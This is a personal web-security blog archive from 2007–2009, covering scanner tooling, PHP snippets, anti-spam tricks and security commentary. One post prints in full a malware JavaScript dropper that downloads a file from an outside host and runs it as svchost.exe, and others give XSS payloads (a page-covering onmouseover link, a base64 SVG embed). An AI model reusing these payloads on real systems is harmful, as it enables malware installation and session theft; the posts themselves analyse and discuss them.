Saturday, February 21 2009
By Romain on Saturday, February 21 2009, 15:11 UTC - Information
Fortify just posted a nice blog
post about the audit they did on several reference implementation that
compete for being the next NIST SHA-3.
They do not release much information on their findings: only one is
described. I would have really like to see how powerful was the analysis (if it
was) to find these problems.
It could be nice too to see other tool vendors, such as Grammatech,
Klocwork, Coverity, etc. to do the same, and then, start another competition
;)
I'd really like to emphasize the conclusions in the Fortify's blog post:
Reference implementations don't disappear, they serve as a starting point
for future implementations or are used directly. A bug in the RSA reference
implementation was responsible for vulnerabilities in OpenSSL and two seperate
SSH implementations. They can also be used to design hardware implementations,
using buffer sizes to decide how much silicon should be used.
The other consideration is speed, which will be a factor in the choice of
algorithm. The fix for the MD6 buffer issues was to double the size of a
buffer, which could degrade the performance. On the other hand, memory leaks
could slow an implementation. A correct implementation is an accurate
implementation.
Tuesday, January 13 2009
By Romain on Tuesday, January 13 2009, 07:17 UTC - Stuffs
Marcin and Tyler just started a new website, which
is kind of fun: sslfail.com (wall of shame of
SSL certificates?)
So now, Google & co, fix your certificates :P
Wednesday, September 10 2008
By Romain on Wednesday, September 10 2008, 09:27 UTC - Tech
For the one that don't know Qt, this is a huge and mature framework for
developing GUI & more on different platform (to read,
multi-platform). I already did some development using Qt and C++ (especially
when I was working at the GERAD).
As, with Marcin, we wanted to have
a look at some technologies that involved a browser etc. I decided to look at
Qt and the almost-fresh WebKit
integration.
The integration of WebKit in a framework like Qt, allows the developer to
embed supposedly in a easy manner a browser that supports the basic web
technologies which are HTML, CSS and JavaScript (it seems that Flash is going
to be supported soon, and anyway, one can write its own plugin in order to
interact with some specific content) in its application.
And indeed it is easy... I used PyQt in order to
develop a very simple prototype and see what we are able to do with this new
technology. As I know already Python and Qt, it was easy to me to start and be
kinda effective. So, in few hours of work, documentation reading and trying to
understand why and how the Python version of Qt was using such or such thing
compared to the C++ version, I got this workable browser that allows dynamic
JavaScript injection through a console, view the source and a simple encoding
converter (click on the image to see the full screen-shot):
At this point, I was actually very excited, less than 500 lines of Python in
order to create that... was kinda worth few days of work in order to create a
useful tool: the Swiss Army Knife of the Pen-Test.
My next and logic step was to extend the current tool in order to have the
tamper-data like capabilities (eg. being able to hijack the HTTP request and
then tampering the GET/POST data).
And here come the problems... it's apparently not possible to get the
current request then reply when using the WebKit widget in Qt (QWebView). I
tried to use a delegate QNetworkAccessManager in order to overload the POST/GET
request since this object is use to set the proxies etc. but nothing... I think
they just didn't open this possibility for some reason.
Oh well, I then stop developing this prototype and will try to contact Qt
experts/developers just to figure out if there is no other way to do it. I
thought of a solution which would be to have my own HTTP manager using QHttp in
order to do the request, get the response etc. and then sending the content to
the browser; this would be great in a webapps scanner, but for the use that I
wanted with, that would create huge limitation for the user-interaction and
especially for Ajax applications. So, the prototype stays here until I find a
solution or Qt open their network management under the QWebView widget...
Fixed:
An update to let you know that I actually fixed the problem, it was really
stupid from me, but I should really care when the method are virtual or not
before overloading it or not :/ shame on me!
So now, I am able to have a firefox/tamper-data/firebug in one tool :)
Monday, July 28 2008
By Romain on Monday, July 28 2008, 14:10 UTC - Tech
While working on the C++ version of scalp, I had to do massive simple
transformations of a given text, ie. replacements of words by others.
Since the main way to do this (a loop which does a replacement at the time),
is very inefficient, I decided to find something faster. I then came up with a
tree based replacement algorithm; I believe this is kinda famous but I never
heard about such algorithm, it basically uses a non
compact trie in order
to have an efficient search of the current word.
The main algorithm is very simple and similar to a state machine where the
state depends on the next character in the trie. For example, if we want to to
replace the words: "ba", "me", "mp" in a text, the trie will be this following
one:
The idea is then to iterate over all the characters in the text, and for
each letter determines whether this is a possible word to replace or not
(simply by looking if the letter is a child of the trie root). Then, we iterate
over the next letters in the text in order to see if the sequence of letters
are an actual word to replace or not (every time, the same methodology is used:
look in the children at the current state of our iterator in the trie).
This algorithm seems more efficient than the simple replace used in a loop
since we will perform a descent in a tree and therefore replace a linear search
by a logarithm one.
I ran a little statistical comparison between two algorithms: mine and the
simple loop one. The test bed is quite simple and uses randomly generated text
which contains the words to replace with a certain density. In order to create
statistics, I made all the sizes varying and I aggregated the results
from the same dictionary size. So, for a given size of a dictionary
(let's say, 200 words to replace), a text has been generated with a density
that vary from 0.1 to 0.5 (from 10% to 50% of the words in the text will be
words to replace) and finally, the size of the text vary from 25 to 200 words
(and words are randomly generated to be from a size 5 to 32).
As I said previously, the results from a same dictionary size has been
aggregated since I've seen practically that the result mainly depends on the
dictionnary size (it also obviously depends on the size of the text, but as
this is a constant for the 2 algorithm, I can compute the mean of the different
data to extract the average gain for a particular dictionary size).
Finally, here is the curve that shows the logarithm progress of the gain
compared to the classical method):
The reference replace implementation which has been compared to the one I
developed is the following (STL/C++ implementation):
void str_replace(string& where, const string& what, const string& by) {
for (string::size_type i = where.find(what);
i != string::npos;
i = where.find(what, i + by.size()))
where.replace(i, what.size(), by);
}
and has been used M times (M is the size of the dictionary).
I also decided to release a very-early version of this replace algorithm (which
is not template yet):
stree.h
which use the
great STL friendly
tree structure from Kasper Peeters.
As for data information, the here is the code I used to generate the
dictionary, and text with a certain density:
genRandData.cpp
Monday, July 21 2008
By Romain on Monday, July 21 2008, 11:15 UTC - Stuffs
A morning, I woke up, and all the websites using a download system didn't
work anymore. Yeah this is what I've seen. I guess I don't need to tell you
that it was such a pain and that all the downloading systems on the different
websites we have were not working anymore.
Such a big stress thinking that everything is broken at first, then after
some time, realized that the problem is about the Content-Disposition header
field which is dropped.
I wouldn't say that I would like to thank the admin that do no tell people
about the modification... Anyway, I guess this is every time like that?
The Content-Disposition HTTP
header field is used to explain to the browser how the data are presented.
I basically use it in order to force a download system using such php
script:
<?php
// download.php
// some checks on the $fname, variable to be sure
// it exists and is in the allowed directories...
header("Pragma: public");
header("Expires: 0");
header("Cache-Control: must-revalidate, pre-check=0");
header("Content-Type: application/octet-stream");
header("Content-Length: " . filesize($fname));
header("Content-Disposition: attachment; filename=".basename($fname));
header("Content-Description: File Transfer");
@readfile($fname);
exit;
?>
Now, if you cannot submit the Content-Disposition field, then the browser
will download the file called "download.php". A quite simple solution, is to
fool the browser by making the name of the reachable URI the same as the file
it should download, using Mod_Rewrite.
RewriteEngine On
RewriteBase /mydir
RewriteRule ^download/([^/]+)$ /mydir/download.php?file_redir=$1
And just a simple modification in the original script in order to detect the
"file" GET variable. But since we don't want to modify all the (generated or
not) HTML files, we need to make the redirection automatically.
<?php
// download.php
// some checks on the $fname, variable to be sure
// it exists and is in the allowed directories...
if (isset($_GET['file_redir'])) {
$fname = $_GET['file_redir'];
// checks for good files (careful of directory traversal etc.)
header("Pragma: public");
header("Expires: 0");
header("Cache-Control: must-revalidate, pre-check=0");
header("Content-Type: application/octet-stream");
header("Content-Length: " . filesize($fname));
header("Content-Description: File Transfer");
@readfile($fname);
exit;
}
else {
header("Location: /mydir/download/$fname");
exit;
}
?>
Then you don't have to change all your pages. This is of course a (not so?)
temporary solution since the server will do extra work in order to go to the
same state, the download of the file, but well, it does the job to fool the
browser...
Tuesday, May 20 2008
By Romain on Tuesday, May 20 2008, 10:07 UTC - Tech
I was just reading this news
(reported by Kanedaa), decided to look closer to the content of this "malware"
stuff to see if there was some nice techniques behind this so called
"attack".
Oh men! How disappointing to see that this was done by script kiddies... the
"obfuscation" consist of 3 levels of URL encoded javascript... yeah... URL
encoding is for sure an obfuscation very hard to prettify. And the final code
was just not obfuscated either... Just this:
function myCreateOB(o, n) {
var r = null;
try { eval('r = o.CreateObject(n)') }catch(e){}
if (! r) {try { eval('r = o.CreateObject(n, "")') }catch(e){} }
if (! r) {try { eval('r = o.CreateObject(n, "", "")') }catch(e){}}
if (! r) {try { eval('r = o.GetObject("", n)') }catch(e){}}
if (! r) {try { eval('r = o.GetObject(n, "")') }catch(e){}}
if (! r) {try { eval('r = o.GetObject(n)') }catch(e){} }
return(r);
}
function Go(a) {
var s = myCreateOB(a, "WS"+"cr"+"ip"+"t.S"+"he"+"ll");
var o = myCreateOB(a, "AD"+"OD"+"B.St"+"re"+"am");
var e = s.Environment("Process");
var xml = null;
var url = 'http://ad.ox88.info/bbs.jpg';
var bin = e.Item("TEMP") + "svchost.exe";
var dat;
try { xml=new XMLHttpRequest(); }
catch(e) {
try { xml = new ActiveXObject("Mic"+"ros"+"of"+"t.XM"+"LHT"+"TP"); }
catch(e) {
xml = new ActiveXObject("MSX"+"ML2.Ser"+"verXM"+"LHT"+"TP");
}
}
if (! xml) return(0);
xml.open("GET", url, false)
xml.send(null);
dat = xml.responseBody;
o.Type = 1;
o.Mode = 3;
o.Open();
o.Write(dat);
o.SaveToFile(bin, 2);
s.Run(bin,0);
}
function mywoewd() {
var i = 0;
var ss11='{7F5B7F';
var ss12='63-F06';
var ss13='F-4331-8A';
var ss14='26-339E0'
var ss15='3C0AE3D}';
var ss1=ss11+ss12+ss13+ss14+ss15
var ss2="{BD96"+"C55"+"6-65A3-1"+"1D0-98"+"3A-00C04F"+"C29E36}";
var ss3="{AB9"+"BCEDD-E"+"C7E-47"+"E1-93"+"22-D4"+"A210617116}";
var ss4="{00"+"06F"+"033-000"+"0-0000-C0"+"00-00000"+"0000046}";
var ss5="{0006"+"F03A-0000-00"+"00-C000-00"+"00000"+"00046}";
var t = new Array(ss1,ss2,ss3,ss4,ss5,null);
while (t[i]) {
var a = null;
if (t[i].substring(0,1) == '{') {
a = document.createElement("object");
a.setAttribute("classid", "clsid:" + t[i].substring(1, t[i].length - 1));
} else {
try { a = new ActiveXObject(t[i]); } catch(e){}
}
if (a) {
try {
var b = myCreateOB(a, "WSc"+"rip"+"t.Sh"+"ell");
if (b) {
Go(a);
return(0);
}
} catch(e){}
}
i++;
}
}
As reported by Trend Micro, this is supposed to be a download of the trojan:
TROJ_DELF.GKP ... that doesn't mean anything to me but anyway, my AV didn't
detect it :)
Wednesday, December 5 2007
By Romain on Wednesday, December 5 2007, 17:28 UTC - Tools
In my previous blog post, I talked briefly about PHP-Ast/Oracle a PHP source code static analysis framework. I am developing it in order to play with source code and security. The goal of that framework is to be able to perform different type of operations on a PHP source code. I am releasing this tool as it is because I think people may be interested with this... Anyway, I learned a lot doing this.
PHP-Ast/Oracle is developed in C++ and the tool has been developed mainly for:
How it works
The source code repository is divided in 2 parts:
- php-ast is the converter from PHP to XML
- php-oracle is the actual engine
php-oracle get a XML file as input which is the output of php-ast. In the SVN there are some python scripts I used in order to combine the 2 tools (they may be outdated i.e. doesn't work with the current php-oracle).
How I think you could use php-oracle
I do not attend to make a clean build with an executable etc. I just provide source code. I decided to give only the source code because I don't want to spend too much time on creating a clean software, it's only research oriented stuff. Furthermore, there is not much documentation in the source code (advantages of being alone to develop such a tool) and then, only really interested people will download this! I can then help them if they have some question about how it works etc.
Getting the source code
You can download the source here: php-ast-oracle.zip
And the trac repository has more documentation about what the framework actually does: http://trac2.assembla.com/php-ast
Development
The tool is in perpetual development, I don't want to create a real software from that, but I think people can use it to perform security analysis, compute stuff, make code transformation and so on.
Wednesday, November 21 2007
By Romain on Wednesday, November 21 2007, 19:32 UTC - Information
Grabber was a nice project. The main goal for me was to learn stuff around web application security/scanners; I didn't really know much before I started this project.
But now that I've been playing with web apps scanners for more than 10months, I need to create a new one and go deeper in heuristics, browser integration and AI.
Grabber was in fact more a spider+fuzzer than something else... Not a good web apps scanner at all. Thinking of the analysis engine... It's something kinda stupid, no JavaScript execution, just simple heuristics for parsing and levenstein distances ;)
Anyway, I decided to start over this project. It's not gonna be a bunch of python scripts anymore, I am gonna use Qt/C++ extensively. The idea if this project is to be pen-testers oriented and open, I want to create a kind of wrapper around WebKit (especially using QtWebKit), a spider as core utilities and after, using plugins. The plugins should be either in C++ or JavaScript (QtScript actually). So far, we are 3 guys thinking of this project: we didn't start yet but we are open to every contribution; the project will of course be free and GPL'd.
I just post this in order to get some comments or suggestions about what a web apps scanner should do... Feel free to comment/mail...
Tuesday, July 10 2007
By Romain on Tuesday, July 10 2007, 17:24 UTC - Tools
Coverage is a tool written in Python which allows you to track what functionalities/web pages are reached on your website. I use this tool for in my Web Apps Scanner evaluation methodology in order to know if the web apps scanner was able to scan every pages, every functionalities of my test apps.
Anyway, this tool is pretty easy to use even if it requires a MySQL database to store the EntryPoints of the application.
Basically, you setup the database, you insert the entry points into your code and you run the python script
which will generate an HTML report with SVG graphs, reporting the coverage of your application.
Here is a report example
Installation
1/ Database
The database design I used for storing the needed information is the following:
CREATE TABLE `coverage` (
`CoverageID` int(32) NOT NULL auto_increment,
`Apps` varchar(128) character set utf8 collate utf8_unicode_ci NOT NULL,
`Date` date NOT NULL,
`EntryPoint` varchar(255) character set utf8 collate utf8_unicode_ci NOT NULL,
`Origin` varchar(255) character set utf8 collate utf8_unicode_ci NOT NULL,
PRIMARY KEY (`CoverageID`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1 AUTO_INCREMENT=1;
- Apps: name of the covered application
- Date: time when the entry point is reached
- EntryPoint: Name of the entry point with a special format:
** File Reached:
Touch_ + Name of the file with extension, example, Touch_Index.Php, Touch_Search.Php etc.
** Functionality Reached:
Name of the functionality + _ + Name of the file with extension, example, this sequence of entry points of
the page Login.php of a given application:
- Touch_Login.Php : Enter the page Login.Php
- Username_Password_Login.Php : The username and the password are feed
- Call_Function_Login.Php : Call the function login()
- Call_Function_Succeed_Login.Php : The function login succeed
- Call_Function_Error_Login.Php : The function login reported an error
- Origin: the origin string is the concatenation of the md5 of the HTTP_USER_AGENT a pipe and the date; this ID + date is used to be sure to study the same user.
<?php
// ...
$origin = md5($_SERVER['HTTP_USER_AGENT']). '|' . date("j-m-y H:i");
?>
2/ In the code
So, you will need to add, in your apps code, lots of entry points. I made a PHP source code to do that more easily:
<?php
class Coverage{
private $coverage_id = false;
private $coverage = null;
function __construct() {
$this->coverage_id = true;
$this->coverage = mysql_connect('192.168.1.3:3306', 'test', 'test');
mysql_select_db("test_collect");
}
function send($entryPoint){
if ($this->coverage) {
$origin = "";
$origin .= md5($_SERVER['HTTP_USER_AGENT']);
$origin .= ('|' . date("j-m-y H:i"));
$entryPoint = mysql_real_escape_string($entryPoint);
mysql_query("INSERT INTO coverage VALUES(NULL,'BankApp',NOW(),'$entryPoint','$origin')");
}
}
};
$coverage = new Coverage();
function register_EntryPoint($entryPoint) {
global $coverage, $supportCodeCoverage;
if ($supportCodeCoverage) {
$coverage->send($entryPoint);
}
}
?>
Insert this code in a header or something and call:
register_EntryPoint('Touch_MyFile.Php');
etc. in your code where you have functional difference.
Run the tool
To run the tool, you need to have:
- Python + MySQLdb (the python MySQL API)
- The date (in SQL format) you want to cover; for now, it's only one day
- The Origin ID of the user (the MD5(HTTP_USER_AGENT)), basically, you will look at this in the database, or get it by your code etc.
example:
$ python coverage.py 2007-06-28 41942da0293d0b8afcfab4c2d10c2401
$ python coverage.py 2007-04-12
The script must be in the same directory of your files for now... you can download the archive here: coverage.zip
Monday, June 25 2007
By Romain on Monday, June 25 2007, 15:05 UTC - Stuffs
Make sure that your test case is correct!!!!!
Damn I'm stupid, I was working on Grabber on the session state management, and of course, I did a small test case with a couple of pages to be sure the spider can reach every pages.
But, my test case was just stupid and calling twice my index make my session still alive, but the variables were set to an order just crazy and have the same effect as destroying the session.
Anyway, now it works! At least in the next Grabber release:
- Multi site support
- Multi-threading
- Better Session state
management, you can now add the login information in the configuration file
- A new XSS
detector based on few vectors and some variations on this. The XSS
disclosure based on RSnake's Cheat Sheet is still here, but I needed a new one faster...
- A module which makes Grabber be able to be used as a simple spider and will save the information in a XML file
I don't know yet when I'm gonna release the version, I need to make sure it works correctly and is stable, I also need to create something to generate nice report (maybe simple XSLT sheets developer/user side) and I want to work more on the hybrid mechanism using different tools (fortify,pixy,php-sat,swaat...)
Wednesday, May 30 2007
By Romain on Wednesday, May 30 2007, 11:25 UTC - Tools
In one of the last post, I made a comparison between two PHP Source Code Security Analyzers: SWAAT and PHP-SAT. The results was close to say that SWAAT was really better than PHP-SAT.
I started working on the configuration of PHP-SAT and it looks to be quite powerful (well, after talking with Eric Bouwers, I'm waiting for the next release) and I think I will be able to have good results with combining a security oriented configuration and some additional bugpatterns.
On the other hand, SWAAT is really limited for now as example, I've made a simple php script with only SQL queries inside: every lines are highlighted as flawed (and with a MEDIUM level)!! This is simply stupid and they would better don't report anything than doing that... just tell that you don't support SQL Injection for now... Anyway, SWAAT is for me the tool to keep an eye on, I will try to develop some features on it, especially for XSS detection and SQL Injection findings...
Tuesday, May 1 2007
By Romain on Tuesday, May 1 2007, 09:03 UTC - Discussion
After a project, AK gives a short comparison of this two client-side technologies:
http://www.akbkhome.com/blog.php/View/135/XUL_or_extjs.html
Wednesday, April 11 2007
By Romain on Wednesday, April 11 2007, 20:08 UTC - Tech
Today, it reminds me a study from Cmabrigde (http://www.mrc-cbu.cam.ac.uk/~mattd/Cmabrigde/). The idea is that a human needs only few letters in order in a word to understand that word (this is not okay for every word, but it should not be hard to find them).
So the idea is basically to create a captcha as an image with a word, but the word would be disordered in a way that human can read it such as:
CNOTNENT
MANAEGR
KITHCEN
etc.
Okay, based on a current OCR based attack bot, it's doable if you have a dictionary then use something like the levenstein distance
and try to minimize the distance with the current word in the dictionary and the word you found with your OCR.
But well, the captcha has not necessary one word...
The only problem I can see with this method is that the dictionary you use to generate the captcha should be in the language of the targeted human. But well, for most of the websites, you know what readers/users you have...
If I have time I'd try to create a lib for this...
Friday, March 30 2007
By Romain on Friday, March 30 2007, 12:48 UTC - Tech
I love firebug, this is something really good for developing web apps. But today, I got an issue which was pretty annoying! First of all, when I develop a small apps, I used to do this under firefox only with firebug and other nice extension loaded.
But today I got an issue when I wanted to overload the XMLHttpRequest
send function to do other things with: Firebug simply do not allow me to do this, but it works well if I want to overload the 'open' function!
Pretty annoying but you cannot do this with firebug activated:
XMLHttpRequest.prototype.send = function(data) {
sData = transformation(data);
this.originalSend(sData);
}
Tuesday, March 27 2007
By Romain on Tuesday, March 27 2007, 20:40 UTC - Tech
Sven Vetsch/Disenchant has just send me an email with the Vigenere's version of the obfuscation script.
This version is quite cute, but it's true that the public key is not secure enough... let's work on another version with public and private key!.
You can find Disenchant's script here.
By Romain on Tuesday, March 27 2007, 11:18 UTC - Tech
Always on the same subject: Spam bots, i was thinking that obfuscation would be a good way to prevent spam bots. Then I first start playing with reverse strings even if it may be obvious for the bots but well, I'm pretty sure it's even more difficult than the previous technique which can almost be passed with an intelligent-but-with-no-javascript-support parser.
So this version is quite simple:
<script>
String.prototype.reverse = function() { return this.split('').reverse().join(''); };
function reverseNames() {
formElement = document.forms[0].elements;
for(var i = 0; i < formElement.length; i++) {
formElement[i].name = formElement[i].name.reverse();
}
formElement.submit();
}
</script>
...
<form method="post" action="check.php" onsubmit="reverseNames()">
<label for="emanresu">‮emanresu‭</label> <input type="text" name="emanresu" /> <br />
You can find the running example: here.
While talking about obfuscation/crypto, since there are few parameters to obfuscate/encrypt maybe a Vigenere
algorithm would be nice...
Note that we do not use the 'username' instance in the HTML page, if you want to print 'username' you can use the character ‮ which reverses the following text.
Friday, March 23 2007
By Romain on Friday, March 23 2007, 17:30 UTC - Tech
I used to talk about technique to prevent spam bots for registering or posting somewhere. Even though I think that a good solution for this is to create SessionID with JavaScript, I was a little bit stuck with phpBB2 because of the template engine, I cannot easily dynamically write a JavaScript in the page.
So, the solution I used is to simply create a CAPTCHA which is written in the page with JavaScript such as:
document.write("<input type='hidden' name='persoCaptcha' value='" + generateStaticKeyWord() + "' />");
And then, I had to check for this value in the PHP script.
Fairly simple, but it seems to work without lots of modification of the phpBB2 forum... Here is a list of spam bots that I detected with this technique on a forum. Even if this technique works for now, I will have to use a better one...
Wednesday, March 14 2007
By Romain on Wednesday, March 14 2007, 19:36 UTC - Tech
This a really nothing to do with web application security, but a friend asked me how to protect a bunch of html files in a directory. He was looking for sessions based solutions but for this he would have to rename the html files in php or whatever and then, implement the protection... pretty boring!
I suggest him a really easy and not perfect solution: checking the referer when accessing the html files (this is the kind of protection as the images anti-thief):
# .htaccess
# -------
RewriteEngine on
RewriteCond %{HTTP_REFERER} !.*yousite.com/.* [NC]
RewriteRule ^(.*)$ /fail.html [NC]
You can find an example here.
PS: this could not be a valid solution for lots of application!
Friday, March 9 2007
By Romain on Friday, March 9 2007, 10:44 UTC - Discussion
The W3C announced yesterday that a new Working Group was created for working on the HTML language.
I don't know if you think the same way than me about this, but for me, HTML language is such a pain in the ass for security. It allows too much things, modifications, ill-written html... With XHTML we have the opportunity to have a quite strict language which is definitely better...
Please guys, when you are doing the new HTML think with security in mind, thanks.
Wednesday, February 28 2007
By Romain on Wednesday, February 28 2007, 13:47 UTC - Tech
For almost a week, I've been working with zeno, wisec and others on JavaScript events and HTML Tags; what event can be executed in what tag...
The testing is definitely not finished but I was implementing a JavaScript Unit Testing based test bed for keeping everybody out of clicking on 8700 testcases * nb_browsers...
Anyway, the method I use is to fire a JavaScript event on the load of the document to verify if it works (the information are gathering by the JSUnit Framework).
So, the funny part in firefox is that I can fire almost every event in every tag; you can find an example here where I do something like that:
<acronym onsubmit="alert('TEST')">test</acronym>
The equivalent Internet Explorer version can be find here (it works well... ie does nothing).
I didn't really take the time to think about this but I'm sure something can come from this...
Edit: Wisec found that under firefox you can also fire every events on unexisting tags such as:
<unex ondblclick="alert('TEST')">test</unex >
Friday, February 23 2007
By Romain on Friday, February 23 2007, 08:10 UTC - Vulnerabilities
Yesterday, on the #webappsec channel, heanol asked how to do an XSS Injection in a anchor tag <a> without the style="expression(..)" referenced by RSnake in the XSS Cheat Sheet.
Then, I proposed him to use the JavaScript event onmouseover="" attribute... Thinking about this it's not really good because the victim has to put his mouse over this link which can be very small etc.
My idea then is to use CSS to make this link taking all the page: this is pretty basic but powerful!
<a href="the link" onmouseover="alert('XSS');"
style="position:absolute;top:0px;width:100000px;height:1000px;z-index:99999;" >Link</a>
I'll try to post some other CSS based interesting XSS injection...
Friday, February 16 2007
By Romain on Friday, February 16 2007, 14:11 UTC - Vulnerabilities
Months ago, I talked about the SVG file and the possibility to include JavaScript inside. Yesterday, I read on the blog of Disenchant that this needed XML Injection: that's true.
But then, I started thinking about variants of this and an embedded SVG
encoded with Base64 seems to work.
The injected string should be something like:
<embed src="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH
A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv
MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs
aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw
IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh
TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml"
AllowScriptAccess="always" />
Edit:
You can also find it here now XSS Cheat Sheet.
Thursday, February 15 2007
By Romain on Thursday, February 15 2007, 11:32 UTC - Discussion
While reading the new post on Jungsonn's blog I decided to explain my point of view here.
Well, the background is around the news in the New York Times made by Acunetix (a Web Apps Scanner vendor):
70% of the websites scanned were found to contain high or medium vulnerabilities ..
I will not talk about the Joe Snyder declaration/bet which is kinda ... well sad for him :/
So, I guess the point of the discussion and maybe the misunderstanding between Acunetix, Joe Snyder, Jungsonn and the many others are the definition of basic words such as vulnerability.
First of all, I have to say that Jungsonn is right when he talk about the kind of vulnerabilities he focus on: let's say directly exploitable to generate some failure on the web apps.
But the point is that a vulnerability is not only this, it may also be really soft! If somebody is able to disclose some information on your website such as list files in a directory (directory listing), reach a sub-domain that he should not be aware of... All of this are vulnerabilities because somebody can get some information from it even if it's not directly exploitable such as remote file inclusion, sql injection etc.
And if I had a to use a Web Apps Scanner, I really need this tool to report all of this things because it should replace (for my company) the consultant team or the hiring of a security expert...
I really think this kind of discussion comes because we don't have a real taxonomy of this words and people have different thinking about security...
And of course I don't claim to have the truth, but at least that's my point of view...
Wednesday, February 7 2007
By Romain on Wednesday, February 7 2007, 18:43 UTC - Tools
If you have ever think about using a web application scanner for testing the security of your website, you certainly made a choice: Which web apps scanner should I buy/use ?
In this post, I will not tell you what is the better black box tester for whatever kind of web application.
The web applications may be very different, the tools are different and thus they could have different efficiency (i think it's non countable noun)... If you read this, you probably know that I am talking about scanners such as WebInspect, AppScan, Acunetix, Hailstorm, Pantera, Grabber... In the following sections, I will explain a main idea that should be used for testing such a tool.
A test suite for our tools is a website, this website has typically vulnerabilities; you can see this kind of website by watchfire, spi but also WebGoat, SiteGenerator or others. But all of these websites are not realistic and do not consider that the vulnerabilities may exist in different instances: variants.
If you don't know what is a variant check at the XSS Cheat Sheet (RSnake) or at the Attack Patterns (Sean Barnum). A variant is what the hacker use to perform his exploit.
A simple example for XSS is:
Let's say you protect your website against XSS by checking the <script> tag; this is not perfect and not good because there is some way to insert other type of XSS strings (onmouseover).
Here comes the concept of Level Of Defense. If you are a developer you think about filters, if you are an attacker you think about variants of vulnerability and attack patterns. The level of defense of a website is the strength of its filters again a given vulnerability.
For a SQL Injection you can have multiple type of filters... Here is a possible list of levels for the SQL Injection:
- Level 0: Show SQL errors / No input filtering
- Level 1: Hide SQL errors / No input filtering
- Level 2: Typecasting (integer, string etc.)
- Level 3: Escaping input strings
- Level 4: Restricted accounts...
- ...
In the concept of the level of defense, it's important to not that depending of the type of vulnerability (weakness, failure...) the level n-1 is also performed in the level n or the level n is stronger (for the same variants) than the level n-1 (for instance, for Weak Hash Function it's not possible but using SHA-1 instead of MD5 is a level of defense higher).
A Key point:
When you are implementing a level of defense for a vulnerbility, you must be sure that your implementation does the whole thing for that type of filter. For example, if you are escaping the HTML entities, you need to do all not only '<', '>' and in the next LoD escaping ' and ".
Why is the level of defense better than a simple system with vulnerabilities?
With the level of defense, you can calibrate a type of website which may be close to yours; you can construct a test suite with your kind of level of defense and see how the tool detect the vulnerabilities when the LoD increase.
It is also a good way to know the state of the art of the tools for detecting vulnerabilities...
The idea was developed to create a test suite in order to evaluate web apps scanners; in this test suite we can select the current type of vulnerability and its level of defense (the hardness to break):
Saturday, February 3 2007
By Romain on Saturday, February 3 2007, 13:26 UTC - Python
A couple of months ago, I had to make a Source Code Search Engine for the SAMATE Reference Dataset. The organization of our source code are not really common but still, it's easy to understand and organized.
I now release this tiny python script in the beta section: pyIndex.
You should have all the information you need to use/adapt this script for your own purposes; it uses a MySQL database and MySQLdb to connect to the database. The script is only for adding some words or references in the database, the search is not done (but it's only a really simple SQL
query...)
Wednesday, January 31 2007
By Romain on Wednesday, January 31 2007, 21:00 UTC - Tech
There is many ways to prevent spam from the bayesian tests (statistical tests) to the basic captcha
... But we all know that pictures captcha can be bypassed by OCR
even if it can be quite tough, there is some sofwtare and articles (example here).
Well, let's talk about 2 other ways:
1. JavaScript version
Assuming that robots do not interpret JavaScript (which is probably true for most of the bots) it would be nice to have a hidden field filled by JavaScript. It's quite simple to make such a script:
var W3CDOM = (document.createElement);
var inputInserted = false;
function addInput() {
if (!W3CDOM || inputInserted)
return;
// create the input form
var hiddenInput = document.createElement('input');
hiddenInput.type = "hidden";
hiddenInput.name = "testBrowser";
hiddenInput.value = "success";
//now add the input to the DOM.
document.forms[0].appendChild(hiddenInput);
inputInserted = true;
}
Then, you test that the GET/POST('testBrowser') == 'success';
The input looks like that:
<input type="text" name="OneOfMyFields" onclick="addInput()" />
2. Script generated form
The idea is to create a form with one input which has different instances, let's say:
<input class='c1' type="text" name="login_1" value="" />
<input class='c2' type="text" name="login_2" value="" />
<input class='c3' type="text" name="login_3" value="" />
With your script, you choose a 'random' number from 1 to 3, create the good CSS
style (hide the not chosen value). The script store in the a cookie /SESSION/JavaScript the value of the random number then check after with this value.
If another input than the good one is filled than this should be a automated thing...
These techniques are absolutely not perfect at all, for the first, the assumption is quite odd I mean than it's not too hard to build a bot which can handle javascript/css/dom etc. and for the second, the 3 inputs are not enough, you need at least 30
for a representative trust.
Wednesday, January 24 2007
By Romain on Wednesday, January 24 2007, 08:12 UTC - Stuffs
You are not an expert in CSS
? Neither I am, I often get some trouble with IE/Opera/FF compatibility...
Whatever, you can find here some 53 cool techniques to create nice CSS.
Thursday, January 11 2007
By Romain on Thursday, January 11 2007, 11:44 UTC - Stuffs
Even if i'll be busy with papers and tests, I really would like to do different things:
- Grabber: Adding an encoding stuffs for testing with different type of charsets (UTF-7/8/16 and other type of languages)
- Create a JavaScript functional analyzer: I've been thinking on this for a while, I think this is a good idea to detect XSS. I was thinking of using Stratego/XT for the parsing/AST construction; but still, because it's javascript, it's really hard to parse every possible things.
- XSS Handler: Just for fun, I want to do a PHP function for preventing XSS (using mb_strings) and the same kind of thing in Python
Sunday, January 7 2007
By Romain on Sunday, January 7 2007, 14:25 UTC - Python
One thing I really hate with the iPod is that the songs are pseudo-obfuscated in a hidden directory on the iPod. Therefor, we cannot, with iTunes, copy the mp3 from the iPod to the iTunes library (at least under windows) ... This is really stupid!
Anyway, there is lots of tools to do that and very well, but I decided to do one: an embedded one. The executable/script is on your iPod, then you can copy your files everywhere :)
iDumper is available in my beta/ repository.
Wednesday, January 3 2007
By Romain on Wednesday, January 3 2007, 09:54 UTC - Vulnerabilities
I've just read it on Stefan Esser's blog: Stefano Di Palmo has disclose an XSS hole in the Acrobat PDF Documents.
Just to have a look at this you can go here: PDF and XSS under Google!
This vulnerability is really important, be careful when you're opening a PDF file...
All of these vulnerabilities in rich documents (FLASH, MHTML, SVG, Quick Time Movie, PDF, etc.) look like there is a big lack of security when people are designing this. Of course these are amazing documents and very useful, but with the so called Web 2.0 (and maybe the next web 3.0 with video broadcasting and much more) there is more and more holes.
What can we do? Think twice before creating web services with media documents?
This is not productive enough and maybe a little security lack is not really bad.Do we care if a couple of guys can steal some passwords...
